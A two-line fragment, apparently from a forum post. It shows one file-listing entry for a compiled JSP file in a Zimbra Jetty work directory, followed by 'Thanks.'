2171166 8 -rw-r----- 1 zimbra zimbra 6750 May 28 19:19 /opt/zimbra/jetty/work/zimbra/jsp/org/apache/jsp/downloads/spam_005ffilter_jsp.java
Thanks.